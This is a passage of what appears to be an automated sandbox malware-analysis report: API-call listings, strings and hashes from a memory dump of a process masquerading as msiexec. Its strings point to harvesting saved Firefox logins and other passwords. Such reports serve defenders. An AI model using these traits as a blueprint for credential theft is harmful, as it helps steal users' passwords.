• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetDlgItem.USER32(?,000003EA), ref: 00413239
• SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
• {Unknown}, xrefs: 004132A6
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000,?,?), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
• GetSysColorBrush.USER32(0000000F), ref: 00401308
• GetDlgItem.USER32(?,000003EE), ref: 00401329
• EndDialog.USER32(?,?), ref: 0040135E
• DeleteObject.GDI32(?), ref: 0040136A
• GetDlgItem.USER32(?,000003ED), ref: 0040138F
• ShowWindow.USER32(00000000), ref: 00401398
• GetDlgItem.USER32(?,000003EE), ref: 004013A4
• ShowWindow.USER32(00000000), ref: 004013A7
• SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
• SetWindowTextW.USER32(?,00000000), ref: 004013CA
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
• SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID:
APIs
• memset.MSVCRT ref: 00404172
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
• wcscpy.MSVCRT ref: 004041D6
• wcscpy.MSVCRT ref: 004041E7
• memset.MSVCRT ref: 00404200
• memset.MSVCRT ref: 00404215
• _snwprintf.MSVCRT ref: 0040422F
• wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 0040426E
• memset.MSVCRT ref: 004042CD
• memset.MSVCRT ref: 004042E2
• _snwprintf.MSVCRT ref: 004042FE
• wcscpy.MSVCRT ref: 00404311
Strings
Similarity
• API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
• String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
APIs
  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
• SetMenu.USER32(?,00000000), ref: 00411453
• SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
• GetModuleHandleW.KERNEL32(00000000), ref: 00411495
• LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
• GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
• CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
• memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
• ShowWindow.USER32(?,?), ref: 004115FE
• GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
• GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
• RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
• SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
• SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
Strings
Similarity
• API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
• String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
APIs
Strings
Similarity
• API ID: wcscat$_snwprintfmemset$wcscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
• GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
• GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
• GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
• GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
• GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
APIs
Strings
Similarity
• API ID: _snwprintfmemset$wcscpy$wcscat
• String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
APIs
Strings
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
APIs
  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
• GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
• LoadIconW.USER32(00000000,00000072), ref: 004035CA
• GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
• LoadIconW.USER32(00000000,00000074), ref: 004035E4
• GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
• LoadIconW.USER32(00000000,00000073), ref: 004035F8
• GetModuleHandleW.KERNEL32(00000000), ref: 00403607
• LoadIconW.USER32(00000000,00000075), ref: 0040360C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
• LoadIconW.USER32(00000000,0000006F), ref: 00403620
• GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
• LoadIconW.USER32(00000000,00000076), ref: 00403634
• GetModuleHandleW.KERNEL32(00000000), ref: 00403643
• LoadIconW.USER32(00000000,00000077), ref: 00403648
• GetModuleHandleW.KERNEL32(00000000), ref: 00403657
• LoadIconW.USER32(00000000,00000070), ref: 0040365C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
• LoadIconW.USER32(00000000,00000078), ref: 00403670
Similarity
• API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
                                                                                                        APIs
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                        • _snwprintf.MSVCRT ref: 0044488A
                                                                                                        • wcscpy.MSVCRT ref: 004448B4
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                        • API String ID: 2899246560-1542517562
                                                                                                        • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                        • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                        • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                        • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040DBCD
                                                                                                        • memset.MSVCRT ref: 0040DBE9
                                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                          • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                          • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                          • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                        • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                        • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                        • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                        • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                        • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                        • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                        • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                        • API String ID: 3330709923-517860148
                                                                                                        • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                        • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                        • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                        • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                          • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                        • memset.MSVCRT ref: 0040806A
                                                                                                        • memset.MSVCRT ref: 0040807F
                                                                                                        • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                        • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                        • memset.MSVCRT ref: 004081E4
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                          • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                          • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                          • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                          • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                          • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                          • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                        • String ID: logins$null
                                                                                                        • API String ID: 2148543256-2163367763
                                                                                                        • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                        • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                        • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                        • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                        APIs
                                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                        • memset.MSVCRT ref: 004085CF
                                                                                                        • memset.MSVCRT ref: 004085F1
                                                                                                        • memset.MSVCRT ref: 00408606
                                                                                                        • strcmp.MSVCRT ref: 00408645
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                        • memset.MSVCRT ref: 0040870E
                                                                                                        • strcmp.MSVCRT ref: 0040876B
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                        • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                        • String ID: ---
                                                                                                        • API String ID: 3437578500-2854292027
                                                                                                        • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                        • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                        • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                        • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0041087D
                                                                                                        • memset.MSVCRT ref: 00410892
                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                        • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                        • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                        • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 1010922700-0
                                                                                                        • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                        • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                        • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                        • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                        • malloc.MSVCRT ref: 004186B7
                                                                                                        • free.MSVCRT ref: 004186C7
                                                                                                        • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                        • free.MSVCRT ref: 004186E0
                                                                                                        • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                        • malloc.MSVCRT ref: 004186FE
                                                                                                        • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                        • free.MSVCRT ref: 00418716
                                                                                                        • free.MSVCRT ref: 0041872A
                                                                                                        • free.MSVCRT ref: 00418749
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$FullNamePath$malloc$Version
                                                                                                        • String ID: |A
                                                                                                        • API String ID: 3356672799-1717621600
                                                                                                        • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                        • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                        • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                        • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsicmp
                                                                                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                        • API String ID: 2081463915-1959339147
                                                                                                        • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                        • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                        • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                        • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                        • API String ID: 2012295524-70141382
                                                                                                        • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                        • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                        • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                        • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
